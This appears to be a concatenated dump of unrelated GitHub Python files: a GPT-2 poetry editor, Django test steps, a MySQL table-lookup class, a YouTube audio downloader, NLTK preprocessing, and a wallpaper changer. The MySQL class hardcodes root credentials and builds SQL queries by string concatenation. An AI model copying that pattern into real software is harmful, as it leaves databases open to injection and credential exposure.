''\n\t\t\telif char == '\\x1b': # custom text\n\t\t\t\tnew_text = self.get_custom_text(old_text)\n\t\t\telif char == '\\\\': # delete chunk\n\t\t\t\tnew_text = self.delete_chunk(old_text)\n\t\t\telif char == '/': # auto-accept next n chunks\n\t\t\t\treset_prompt = int(self.write_text_get_input(old_text, new_text+\"\\nHow many chunks to auto-accept?::\"))\n\t\t\t\tif reset_prompt == 0:\n\t\t\t\t\tnew_text = ''\n\t\t\telif char == 's':\n\t\t\t\tself.save_poem(old_text)\n\t\t\t\tnew_text = ''\n\t\t\telif char == 'r':\n\t\t\t\tnew_text = ''\n\t\t\t\treset_prompt = True\n\t\t\telif char in ('\\x03', '\\x1a', 'q'):\n\t\t\t\traise Exception(\"Exiting Upon User Request...\")\n\t\t\telif char != '\\r':\n\t\t\t\tdecision_received = False\n\t\t\t\tprint(\"\\n\\npress 'enter' to accept\")\n\t\t\t\tprint(\"press 'delete' to reject\")\n\t\t\t\tprint(\"press an arrowkey to edit\")\n\t\t\t\tprint(\"press backslash to delete chunk\")\n\t\t\t\tprint(\"press fwdslash to auto-accept next n chunks\")\n\t\t\t\tprint(\"press 's' to save\")\n\t\t\t\tprint(\"press 'r' to reset prompt\")\n\t\t\t\tprint(\"press 'q' to quit\\n\")\n\t\t\t\tprint(\"(press any key to acknowledge these instructions.)\\n\", flush=True)\n\t\t\t\t# wait for user acknowledgement of instructions\n\t\t\t\t_ = getch()\n\t\t\t\t# try again (we're in a while loop)\n\n\t\treturn new_text, reset_prompt\n\n\t# helper for self.decide()\n\tdef delete_chunk(self, old_text):\n\t\tos.system('clear')\n\t\tprint('\\033[A\\033[2K')\n\t\ttext_tokens = [self.enc.decode([token]) for token in 
self.enc.encode(old_text)]\n\t\tn_tokens = len(text_tokens)\n\t\tfor t in range(n_tokens):\n\t\t\ttoken = text_tokens[t]\n\t\t\tprint(str(n_tokens-t-1)+'::'+token)\n\t\tprint('\\n\\n'+'='*15)\n\t\tnew_text = False\n\t\twhile type(new_text) != int:\n\t\t\ttry:\n\t\t\t\tnew_text = min(int(input()), len(text_tokens))\n\t\t\texcept:\n\t\t\t\tprint(\"# Tokens To Remove: \")\n\t\t# # process the enter key\n\t\t# _ = getch()\n\t\t# _ = getch()\n\t\treturn new_text\n\n\t# helper for self.decide()\n\tdef get_custom_text(self, old_text):\n\t\t# get custom text\n\t\tcustom_text = self.write_text_get_input(old_text)\n\t\t# # process the enter key\n\t\t# _ = getch()\n\t\t# _ = getch()\n\t\t# If user immediately pressed 'enter' then that's their input\n\t\tif not custom_text:\n\t\t\tcustom_text = '\\n'\n\n\t\treturn custom_text\n\n\t# write poem to file (ask user for filename)\n\tdef save_poem(self, poem):\n\t\tfilename = ''\n\t\tprompt = ''\n\t\twhile not filename:\n\t\t\tprompt += \"\\nEnter File Name::\"\n\t\t\tfilename = self.write_text_get_input(poem, prompt)\n\t\t\tfilename, prompt = self.is_valid(filename)\n\t\twith open(filename, 'w') as f:\n\t\t\tf.write(poem)\n\t\treturn ''\n\n\t# helper for Generator.save_poem(); returns filename if valid - else empty string\n\tdef is_valid(self, filename):\n\t\tsplit_filename = filename.split('.')\n\t\t# check if input is invalid\n\t\t#\ti.e. if it has extra '.'s or is empty or not alphanumeric\n\t\tvalid_name = True\n\t\tif len(split_filename) > 2 or not split_filename[0]:\n\t\t\tvalid_name = False\n\t\telse:\n\t\t\tfor character in split_filename[0]:\n\t\t\t\tif not character.isalnum() and character not in ('-', '_'):\n\t\t\t\t\tvalid_name = False\n\t\t\t\t\tbreak\n\t\tif not valid_name:\n\t\t\tprompt = \"\\n{} is not a valid filename.\".format(filename)\n\t\t\tfilename = ''\n\t\telse:\n\t\t\t# if user excluded file extension, add it\n\t\t\tif len(split_filename) == 1:\n\t\t\t\tprompt = ''\n\t\t\t\tfilename = filename+'.txt'\n\t\t\t# if file already exists don't overwrite\n\t\t\tif os.path.isfile(filename):\n\t\t\t\tprompt = \"\\n{} already exists. 
Please enter a different filename.\".format(filename)\n\t\t\t\tfilename = ''\n\n\t\treturn filename, prompt\n\n\n\tdef write_text_get_input(self, text, input_prompt=''):\n\t\tos.system('clear')\n\t\tprint('\\033[A\\033[2K', flush=True)\n\t\tprint(\"{}::\".format(text), end='', flush=True)\n\t\tuser_input = input(input_prompt)\n\t\treturn user_input\n\n\n\nimport sys, termios, tty, os, time\n# capture arrow key stroke \ndef getch():\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n \n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\n\n\n","repo_name":"joemeyer1/gpt2-poetry","sub_path":"src/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":8959,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"3232192834","text":"# -*- coding: utf-8 -*-\nimport json\nimport time\n\nfrom behave import *\n\nfrom test import bdd_util\nfrom features.testenv.model_factory import *\n\nfrom django.test.client import Client\nfrom mall.models import *\nfrom modules.member.models import *\n\n@given(u\"{user}登录系统\")\ndef step_impl(context, user):\n\tcontext.client = bdd_util.login(user, password=None, context=context)\n\n@when(u\"{user}添加会员分组\")\ndef step_impl(context, user):\n\t__add_member_tag(context, user)\n\n@given(u\"{user}添加会员分组\")\ndef step_impl(context, user):\n\t__add_member_tag(context, user)\n\ndef __add_member_tag(context, user):\n\tMemberTag.objects.all().delete()\n\tclient = context.client\n\tcontext.member_tags = {}\n\tfor tag_id, tag_name in json.loads(context.text).items():\n\t\tif tag_name != '未分组':\n\t\t\ttag_id = 'tag_id_{}'.format(int(tag_id.split('_')[2]) + 1)\n\t\tcontext.member_tags[tag_id] = tag_name\n\tresponse = client.post('/member/api/member_tags/',\n\t\tcontext.member_tags)\n\n@then(u\"{user}能获取会员分组列表\")\ndef step_impl(context, user):\n\tif hasattr(context, 'client'):\n\t\tcontext.client.logout()\n\tcontext.client = bdd_util.login(user)\n\tclient = context.client\n\n\tresponse = client.get('/member/member_tags/')\n\tmember_tags =response.context['member_tags']\n\ttag_list = []\n\tfor tag in member_tags:\n\t\ttag_list.append({\"name\":tag.name,\"group_membership\":tag.count})\n\texpected = json.loads(context.text)\n\tbdd_util.assert_list(expected, tag_list)\n\n\n@when(u\"{user}更新会员分组\")\ndef step_impl(context, user):\n\tclient = context.client\n\tnew_member_tag = json.loads(context.text)\n\tresponse = client.post('/member/api/member_tags/' ,new_member_tag)\n\n\n@when(u\"{user}删除会员分组\")\ndef step_impl(context, user):\n\tclient = context.client\n\tnew_member_tag = json.loads(context.text)\n\tresponse = client.post('/member/api/member_tags/' ,new_member_tag)\n\n\n\n\n","repo_name":"chengdg/weizoom","sub_path":"weapp/features/steps/member_tag_steps.py","file_name":"member_tag_steps.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3823702413","text":"import pymysql;\nfrom datetime import datetime;\nfrom dateutil.relativedelta import relativedelta;\nimport numpy as np;\nconn = pymysql.connect(host ='localhost',user = 'root', password = 'root', db = 'djangorbi');\nclass MySQL_CAL:\n def GET_TBL_52(self, fluid):\n row = np.zeros(10);\n Cursor = conn.cursor();\n try:\n sql = \"SELECT `MW`,`Density`,`NBP`,`ideal`,`A`,`B`,`C`,`D`,`E`,`Auto` FROM `TBL_52_CA_PROPERTIES_LEVEL_1` WHERE `Fluid` = '\" + 
fluid + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n row[0] = r[0];\n row[1] = r[1];\n row[2] = r[2];\n row[3] = r[3];\n row[4] = r[4];\n row[5] = r[5];\n row[6] = r[6];\n row[7] = r[7];\n row[8] = r[8];\n row[9] = r[9];\n except pymysql.InternalError as Error:\n print(\"Error! execute table 5.2\");\n return row;\n\n def GET_RELEASE_PHASE(self, fluid):\n data = \"Liquid\";\n Cursor = conn.cursor();\n try:\n sql = \"SELECT `Ambient` FROM `TBL_52_CA_PROPERTIES_LEVEL_1` WHERE `Fluid` = '\" + fluid + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data = r[0];\n except pymysql.InternalError as Error:\n print(\"Error! get Release Phase from table 5.2\");\n return data;\n\n def GET_TBL_58(self, fluid):\n data = np.zeros(16);\n Cursor = conn.cursor();\n try:\n sql = \"SELECT * FROM `TBL_58_CA_COMPONENT_DM` WHERE `Fluid` = '\" + fluid + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data[0] = r[1];\n data[1] = r[2];\n data[2] = r[3];\n data[3] = r[4];\n data[4] = r[5];\n data[5] = r[6];\n data[6] = r[7];\n data[7] = r[8];\n data[8] = r[9];\n data[9] = r[10];\n data[10] = r[11];\n data[11] = r[12];\n data[12] = r[13];\n data[13] = r[14];\n data[14] = r[15];\n data[15] = r[16];\n except pymysql.InternalError as Error:\n print(\"Error! execute data from table 5.8 error!\");\n return data;\n\n def GET_TBL_59(self, fluid):\n Cursor = conn.cursor();\n data = np.zeros(16);\n try:\n sql = \"SELECT * FROM `TBL_59_COMPONENT_DAMAGE_PERSON` WHERE `Fluid` = '\" + fluid + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data[0] = r[1];\n data[1] = r[2];\n data[2] = r[3];\n data[3] = r[4];\n data[4] = r[5];\n data[5] = r[6];\n data[6] = r[7];\n data[7] = r[8];\n data[8] = r[9];\n data[9] = r[10];\n data[10] = r[11];\n data[11] = r[12];\n data[12] = r[13];\n data[13] = r[14];\n data[14] = r[15];\n data[15] = r[16];\n except pymysql.InternalError as Error:\n print(\"Error! Execute data Table 5.9 Fail\");\n return data;\n\n def GET_TBL_213(self, thickness):\n Cursor = conn.cursor();\n data = np.zeros(4);\n try:\n sql = \"SELECT * FROM `TBL_213_DM_IMPACT_EXEMPTION` WHERE `ComponentThickness` = '\" + str(thickness) + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data[0] = r[1];\n data[1] = r[2];\n data[2] = r[3];\n data[3] = r[4];\n except pymysql.InternalError as Error:\n print(\"Error! Execute data from Table 213 Fail\");\n return data;\n\n def GET_TBL_204(self, susceptibility):\n Cursor = conn.cursor();\n data = np.zeros(7);\n try:\n sql = \"SELECT * FROM `TBL_204_DM_HTHA` WHERE `Susceptibility` = '\"+susceptibility+\"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data[0] = r[1];\n data[1] = r[2];\n data[2] = r[3];\n data[3] = r[4];\n data[4] = r[5];\n data[5] = r[6];\n data[6] = r[7];\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql from table 204 Fail\");\n return data;\n\n def GET_TBL_214(self, DeltaT, size):\n Cursor = conn.cursor();\n data = 0.0;\n try:\n sql = \"SELECT `\"+str(size)+\"` FROM djangorbi.tbl_214_dm_not_pwht WHERE `Tmin-Tref` = '\"+str(DeltaT)+\"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data = r;\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql from table 214 Fail\");\n return data;\n\n def GET_TBL_215(self, DeltaT, size):\n Cursor = conn.cursor();\n data = 0;\n try:\n sql = \"SELECT `\" + str(size) + \"` FROM `TBL_215_DM_PWHT` WHERE `Tmin-Tref` = '\" + str(DeltaT) + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data = r;\n except pymysql.InternalError as Error:\n print(\"Error! 
Execute sql from table 215 fail\");\n return data;\n\n def GET_TBL_511(self, ART, INSP, Effective):\n data = 0;\n Cursor = conn.cursor();\n try:\n sql = \"\";\n if(Effective == \"E\"):\n sql = \"SELECT `E` FROM `TBL_511_DFB_THIN` WHERE `art` ='\" + str(ART) + \"'\";\n else:\n sql = \"SELECT `\" + Effective + \"` FROM `TBL_511_DFB_THIN` WHERE `art` ='\" + str(ART) + \"' AND `insp` = '\" + str(INSP) + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data = r;\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql from table 511 Fail\");\n return data;\n\n def GET_TBL_512(self, ART, Effective):\n data = 0;\n Cursor = conn.cursor();\n try:\n sql = \"SELECT `\"+Effective+\"` FROM `TBL_512_DFB_THIN_TANK_BOTTOM` WHERE `art` = '\"+str(ART)+\"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data = r;\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql from table 512 fail!\");\n return data;\n\n def GET_TBL_64(self, YEAR, Suscep):\n data = 0;\n Cursor = conn.cursor();\n try:\n sql = \"SELECT `\" + Suscep + \"` FROM `TBL_64_DM_LINNING_INORGANIC` WHERE `YearsSinceLastInspection` = '\" + str(YEAR) + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data = r;\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql from table 64 fail!\");\n return data;\n\n def GET_TBL_65(self, YEAR, Suscep):\n data = 0;\n Cursor = conn.cursor();\n try:\n sql = \"SELECT `\" + Suscep + \"` FROM `TBL_65_DM_LINNING_ORGANIC` WHERE `YearInService` = '\" + str(YEAR) + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data = r;\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql from table 65 fail\");\n return data;\n\n def GET_TBL_74(self, SVI, field):\n data = 0;\n Cursor = conn.cursor();\n try:\n sql = \"SELECT `\" + field + \"` FROM `TBL_74_SCC_DM_PWHT` WHERE `SVI` ='\" + str(SVI) + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data = r;\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql from table 74 fail\");\n return data;\n\n def GET_TBL_3B21(self, locat):\n data = 0;\n Cursor = conn.cursor();\n try:\n sql = \"SELECT `SIUnits` FROM `TBL_3B21_SI_CONVERSION` WHERE `conversionFactory` = '\" + str(locat) + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data = r;\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql from table 3B21 fail\");\n return data;\n\n def GET_TBL_71_PROPERTIES(self, FluidTank):\n data = np.zeros(3);\n Cursor = conn.cursor();\n try:\n sql = \"SELECT `Molecular Weight`,`Liquid Density`,`Liquid Density Viscosity` FROM `TBL_71_PROPERTIES_STORAGE_TANK` WHERE `Fluid`='\" + FluidTank + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data[0] = r[0];\n data[1] = r[1];\n data[2] = r[2];\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql from table 71 fail\");\n return data;\n\n def GET_API_COM(self, APIComponentTypeName):\n data = np.zeros(13);\n Cursor = conn.cursor();\n try:\n sql = \"SELECT * FROM `api_component_type` WHERE `APIComponentTypeName` = '\"+APIComponentTypeName+\"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data[0] = r[2];\n data[1] = r[3];\n data[2] = r[4];\n data[3] = r[5];\n data[4] = r[6];\n data[5] = r[7];\n data[6] = r[8];\n data[7] = r[9];\n data[8] = r[10];\n data[9] = r[11];\n data[10] = r[12];\n data[11] = r[13];\n data[12] = r[14];\n except pymysql.InternalError as Error:\n print(\"Error! 
Execute sql table API_COMPONENT_TYPE fail\");\n        return data;\n\n\n\n\n","repo_name":"Lab411bkhn/rbi","sub_path":"DjangoRBI/ProcessPython/MYSQL_CAL.py","file_name":"MYSQL_CAL.py","file_ext":"py","file_size_in_byte":9569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19645397302","text":"from pytube import YouTube\nimport ffmpeg\n\ndef save_audio(search_list):\n    print(\"Saving audio\")\n    for ID in search_list:\n        query = 'https://www.youtube.com/watch?v=' + ID\n        print(\"Saving \" + query)\n        yt = YouTube(query)\n        stream = yt.streams.get_audio_only()\n        stream.download(\"./videos\")\n        file_name = stream.default_filename\n        print(file_name)\n\n        # extract the audio track and convert it to mp3\n        stream = ffmpeg.input(\"./videos/\" + file_name)\n        audio_stream = stream.audio\n        output_name = \"./audios/\" + file_name.replace(\".mp4\",\"\") + \".mp3\"\n        print(\"out/\" + output_name)\n\n        stream = ffmpeg.output(audio_stream, output_name)\n        ffmpeg.run(stream)","repo_name":"tetsujp84/youtube_audio_downloader","sub_path":"donwload_audio.py","file_name":"donwload_audio.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42437339686","text":"from typing import List, Tuple, Type\n\nfrom sqlalchemy.orm import aliased\n\nfrom infra.entities.course import Course\nfrom infra.entities.registration import Registration\nfrom infra.entities.student import Student\n\nregistration_alias = aliased(Registration)\n\n\nclass RegistrationRepositoy:\n    def __init__(self, ConnectionHandler) -> None:\n        self.__ConnectionHandler = ConnectionHandler\n\n    def __search_student_course(\n        self, id_student: int, id_course: int\n    ) -> Tuple[str, str]:\n        \"\"\"Private method to search for the student's name and course, using parameters.\"\"\"\n\n        with self.__ConnectionHandler() as db:\n            try:\n                data = (\n                    db.session.query(Registration)\n                    .filter(Registration.id_course == id_course)\n                    .where(Registration.id_student == id_student)\n                    .one()\n                )\n                data = (data.student.name, data.course.name)\n                return data\n            except Exception as exception:\n                raise exception\n\n    def select_all(self) -> List[Tuple[int, str, str]]:\n        \"\"\"Searching all registrations\"\"\"\n\n        with self.__ConnectionHandler() as db:\n            try:\n                data = (\n                    db.session.query(Registration)\n                    .join(Student, Registration.id_student == Student.id_student)\n                    .join(Course, Registration.id_course == Course.id_course)\n                    .with_entities(Registration.id_student, Student.name, Course.name)\n                    .all()\n                )\n                return data\n            except Exception as exception:\n                raise exception\n\n    def searching_course(self, id_student: int) -> List[Tuple[str, int]]:\n        \"\"\"Searches all courses in which the student is enrolled\"\"\"\n\n        with self.__ConnectionHandler() as db:\n            try:\n                data = (\n                    db.session.query(Course)\n                    .join(\n                        registration_alias,\n                        Course.id_course == registration_alias.id_course,\n                    )\n                    .filter(registration_alias.id_student == id_student)\n                    .with_entities(Course.name, Course.id_course)\n                    .all()\n                )\n                return data\n            except Exception as exception:\n                raise exception\n\n    def insert(self, id_student: int, id_course: int) -> str:\n        \"\"\"Inserting a new registration.\"\"\"\n\n        with self.__ConnectionHandler() as db:\n            try:\n                data = Registration(id_student=id_student, id_course=id_course)\n                db.session.add(data)\n                db.session.commit()\n                student, course = self.__search_student_course(id_student, id_course)\n                message = f\"Student registration: {student} in course: {course} completed successfully.\"\n                return 
message\n except Exception as exception:\n db.session.rollback()\n raise exception\n\n def update(self, id_student: int, id_course: int) -> str:\n \"\"\"Updating the id_course field in the registrations table.\"\"\"\n\n with self.__ConnectionHandler() as db:\n db.session.query(Registration).filter(\n Registration.id_student == id_student\n ).update({\"id_course\": id_course})\n db.session.commit()\n return \"Update was successful\"\n\n def delete(self, id_student: int) -> str:\n \"\"\"Deleting a registration.\"\"\"\n\n with self.__ConnectionHandler() as db:\n db.session.query(Registration).filter(\n Registration.id_student == id_student\n ).delete()\n db.session.commit()\n return \"Deletion was successful\"\n","repo_name":"AlekysCoelho/SQLALCHEMY_Alembic","sub_path":"infra/repositories/registration_repositories.py","file_name":"registration_repositories.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3525244218","text":"import nltk\n\nimport re\nimport string\n\n\n# Prepare common variables\n\nstopwords = nltk.corpus.stopwords.words('english')\nstopwords_set = set(stopwords)\n\ncontraction_trans_dict = {\n \"'m\": \" am\",\n \"'re\": \" are\",\n \"'s\": \" is\",\n \"'ve\": \" have\",\n \"'ll\": \" will\",\n \"'d\": \" had\",\n \"n't\": \" not\"\n}\n\npunctuation_trans_dict = {}\npunctuation_trans_dict.update({c: None for c in string.punctuation})\npunctuation_trans_table = str.maketrans(punctuation_trans_dict)\n\n\ndef preprocess_sentence(s_str):\n \"\"\"\n Preprocesses a sentence. Preprocessing operations:\n - Conversion to lowercase.\n - Removing contractions.\n - Removing punctuation marks.\n\n :param s_str: str\n The sentence to preprocess.\n\n :return: str\n The preprocessed sentence.\n \"\"\"\n\n s_str = re.sub(r'\\d+', '', s_str)\n prep_s_str = s_str.lower()\n for key, value in contraction_trans_dict.items():\n prep_s_str = re.sub(key, value, prep_s_str)\n prep_s_str = prep_s_str.translate(punctuation_trans_table)\n return prep_s_str\n\n\ndef tokenize(s_str):\n \"\"\"\n Tokenizes a sentence.\n\n :param s_str:\n The sentence to tokenize.\n :return: list of str\n A list with the sentence tokens.\n \"\"\"\n return nltk.word_tokenize(s_str)\n\n\ndef remove_stopwords(s_tkns):\n \"\"\"\n Removes stopwords from a list of sentence tokens.\n\n :param s_tkns: list of str\n Sentence tokens.\n :return: list of str\n Sentence tokens without stopword tokens.\n \"\"\"\n return [word for word in s_tkns if word not in stopwords]\n","repo_name":"RedReservoir/STS-project","sub_path":"ihlt_sts/transform/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36475366344","text":"\"\"\"\nNuma eleição existem três candidatos. Faça um programa que peça o número total de eleitores.\nPeça para cada eleitor votar e ao final mostrar o número de votos de cada candidato.\n\"\"\"\ncandidato1 = 0\ncandidato2 = 0\ncandidato3 = 0\n\nprint('ELEIÇÃO!\\n'\n '[1] Bolsonaro\\n'\n '[2] Haddad\\n'\n '[3] Ciro')\ntotaleleitores = int(input('Qual é o números total de eleitores? '))\nfor i in range(totaleleitores):\n voto = int(input('Em quem você vota? [1] [2] [3] '))\n if voto > 3 or voto < 1:\n print('Votou errado! Vote novamente!')\n voto = int(input('Em quem você vota? 
[1] [2] [3] '))\n if voto == 1:\n candidato1 += 1\n elif voto == 2:\n candidato2 += 1\n elif voto == 3:\n candidato3 += 1\nprint('\\nRESULTADO DA ELEIÇÃO!')\nprint(f'Bolsonaro conseguiu {candidato1} votos.')\nprint(f'Haddad conseguiu {candidato2} votos.')\nprint(f'Ciro conseguiu {candidato3} votos.')\n","repo_name":"fredy-prudente/python-brasil-exercicios","sub_path":"Estrutura de Repetição/ex26.py","file_name":"ex26.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7705673781","text":"### a code to alwys redirect files to the folder containning the same file format\n\nimport os\n\n#source and distination directory\n\nsorc='/home/abdo_khattab/listen/'\ndist1='/home/abdo_khattab/mp3/'\ndist2='/home/abdo_khattab/pic/'\ndist3='/home/abdo_khattab/vid/'\n\n\n## infinite loop to always redirect file \n\n\nwhile True:\n\n for file in os.listdir(sorc): ## looping throut the source directory\n \n ## check dif formats types and assigning the new path\n \n if file.endswith('.mp3'): \n os.rename(sorc+file,dist1+file)\n elif file.endswith('.jpg'):\n os.rename(sorc+file,dist2+file) \n elif file.endswith('.mp4') :\n os.rename(sorc+file,dist3+file)\n","repo_name":"abood-eg/os_techniques","sub_path":"file_path_changing.py","file_name":"file_path_changing.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14924592569","text":"import os\r\nimport ctypes\r\nimport time\r\nimport random\r\nfrom threading import *\r\n# import sys\r\nimport tkinter as tk\r\nfrom tkinter import filedialog\r\nfrom tkinter import *\r\nimport tkinter.font as font\r\n\r\n\r\n# sys.setrecursionlimit(1000)\r\nmainDizin=\"\"\r\n\r\nclass iplik:\r\n def __init__(self,target):\r\n self.target=target\r\n\r\n def run(self):\r\n thread=Thread(target=self.target) #Tkinter ile oluşturduğum \r\n thread.daemon = True #arayüzün donmasını engellemek\r\n thread.start() # için thread işlemini kullanıyorum\r\n \r\n\r\n\r\n\r\ndef main(dizin,adet,saniye):\r\n for i in range(adet):\r\n dosyaBul(dizin,dizin)\r\n time.sleep(saniye)\r\n \r\n \r\n\r\ndef dosyaBul(dizin,mainDizin):\r\n try:\r\n dosya=dosyaSec(dizin)\r\n if dosyaTuru(dosya)==1:\r\n resim=os.getcwd()+\"\\\\\"+dosya\r\n walpaper(resim)\r\n return resim\r\n \r\n if dosyaTuru(dosya)==2:\r\n liste=os.listdir() \r\n kontrol=[]\r\n for i in liste:\r\n i=i.split('.')\r\n if len(i)==1:\r\n pass\r\n else:\r\n kontrol.append(i[-1])\r\n if \"jpg\" in kontrol:\r\n return dosyaBul(dizin,mainDizin)\r\n else:\r\n return dosyaBul(mainDizin,mainDizin)\r\n except:\r\n return dosyaBul(dizin,mainDizin)\r\n \r\n if dosyaTuru(dosya)==3:\r\n return dosyaBul(os.getcwd()+\"\\\\\"+dosya,mainDizin)\r\n\r\ndef dosyaSec(dizin):\r\n bul=dizin\r\n os.chdir(bul)\r\n mainFolder=os.listdir()\r\n if mainFolder==[]:\r\n print(\"boşşşşşşşşşş\")\r\n return dosyaSec(ustDizin())\r\n \r\n \r\n else:\r\n rnd=random.randint(0,len(mainFolder)-1) \r\n subFolder=mainFolder[rnd] \r\n return subFolder\r\n \r\n\r\ndef dosyaTuru(dosya):\r\n try:\r\n kontrol=dosya.split(\".\")\r\n except:\r\n pass\r\n else:\r\n if len(kontrol)==1:\r\n return 3\r\n else:\r\n if kontrol[-1]==\"jpg\" or \"gif\" or \"png\": #DEŞĞİTİRİLECEK\r\n return 1\r\n else:\r\n return 2\r\n \r\ndef walpaper(dizin):\r\n ctypes.windll.user32.SystemParametersInfoW(20, 0, dizin, 3)\r\n\r\ndef ustDizin(): \r\n while True:\r\n kontrol=os.listdir()\r\n if len(kontrol)==1 or 
len(kontrol)==0:\r\n os.chdir('..')\r\n else:\r\n break\r\n return os.getcwd()\r\n\r\n\r\n \r\ndef tkPencere(mainDizin):\r\n pencere = tk.Tk() # pointing root to Tk() to use it as Tk() in program.\r\n # pencere.attributes('-topmost', True) # Opened windows will be active. above all windows despite of selection.\r\n \r\n pencere.geometry(\"500x300\")\r\n pencere.title(\"Wallpaper Değiştirme\")\r\n \r\n myFont = font.Font(size=40)\r\n \r\n tk.Label(text=\"Adet: \",font=myFont).grid(column=1,row=1)\r\n tk.Label(text=\"Saniye: \",font=myFont).grid(column=1,row=2)\r\n adet=tk.Entry(pencere,font=myFont,width=5)\r\n saniye=tk.Entry(pencere,font=myFont,width=5)\r\n adet.insert(index=10,string='10')\r\n saniye.insert(index=10,string='0.1')\r\n adet.grid(column=2,row=1)\r\n saniye.grid(column=2,row=2)\r\n class program():\r\n def __init__(self):\r\n self.mainDizin=mainDizin \r\n def yol(self):\r\n self.mainDizin = filedialog.askdirectory() # Returns opened path as str\r\n def calistir(self):\r\n if(self.mainDizin!=\"\"):\r\n ic_iplik=iplik(main(dizin=self.mainDizin,adet=int(adet.get()),saniye=float(saniye.get())))\r\n ic_iplik.run() \r\n \r\n else:\r\n tk.messagebox.showerror(\"Hata\",\"Dosya Seçilmedi\")\r\n a=program()\r\n \r\n button=tk.Button(pencere,text=\"Dosya Seç\",command=a.yol,font=myFont,fg=\"Red\")\r\n button.grid(column=1,row=3) \r\n button2=tk.Button(pencere,text=\"Başat\",command=a.calistir,font=myFont,fg=\"Red\")\r\n button2.grid(column=2,row=3)\r\n \r\n pencere.mainloop()\r\n \r\ndis_iplik=iplik(tkPencere(mainDizin))\r\ndis_iplik.run()\r\n\r\n\r\n","repo_name":"vehbix/wallpaper","sub_path":"Wallpaper.py","file_name":"Wallpaper.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18229575077","text":"from analysis.models import Corpus, MethodCategory\nfrom django.core.management.base import BaseCommand, CommandError\n\n\nclass Command(BaseCommand):\n help = 'Load the latest method definitions.'\n\n def handle(self, *args, **options) -> None:\n print('Attempting to set default methods')\n try:\n for category in MethodCategory.objects.all():\n print(f'Setting new defaults for category {category.name}')\n self.handle_category(category)\n except Exception as e:\n raise CommandError(e)\n finally:\n print('Setting new default methods complete')\n\n def handle_category(self, category: MethodCategory):\n new_method = category.definitions.latest()\n corpora = Corpus.objects.filter(method_category=category).exclude(default_method=new_method)\n print(f'Found {len(corpora)} corpora with older methods.')\n for corpus in corpora:\n old_method = corpus.default_method\n corpus.default_method = new_method\n corpus.save()\n print(f'Updated corpus {corpus.name} from {old_method.name if old_method else \"None\"} to {new_method.name}')\n","repo_name":"UUDigitalHumanitieslab/sasta","sub_path":"backend/analysis/management/commands/set_default_methods.py","file_name":"set_default_methods.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74074762154","text":"import os\nimport json\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom .suite import Suite\nfrom typing import Dict, Union\nfrom .rule_reusage_experiment import RuleReusageExperiment\n\n\nclass RuleReusageSuite(Suite):\n def __init__(self, dataset_name: str, error_generator: int = 0):\n 
super().__init__(\"GARF\", \"rule_coverage\", dataset_name, error_generator)\n\n def run(self,\n max_error_rate: float,\n min_error_rate: float = 0.1, \n error_step_size: float = 0.1, \n runs_per_error_rate: int = 5, \n error_intervals: int = 0, \n **kwargs):\n experiment = RuleReusageExperiment(np.inf, \"rule_coverage\", self.dataset)\n experiment.run()\n self.results = experiment.result()\n return self\n \n def merge(self, suite: Suite):\n self._check_results()\n suite._check_results()\n \n row_results, random_nan_results, col_results = self.results\n suite_row_results, suite_random_nan_results, suite_col_results = suite.results\n row_results = pd.concat([row_results, suite_row_results])\n random_nan_results = pd.concat([random_nan_results, suite_random_nan_results])\n col_results = pd.concat([col_results, suite_col_results])\n self.results = row_results, random_nan_results, col_results\n return self\n \n def save(self, arguments: Dict) -> pd.DataFrame:\n 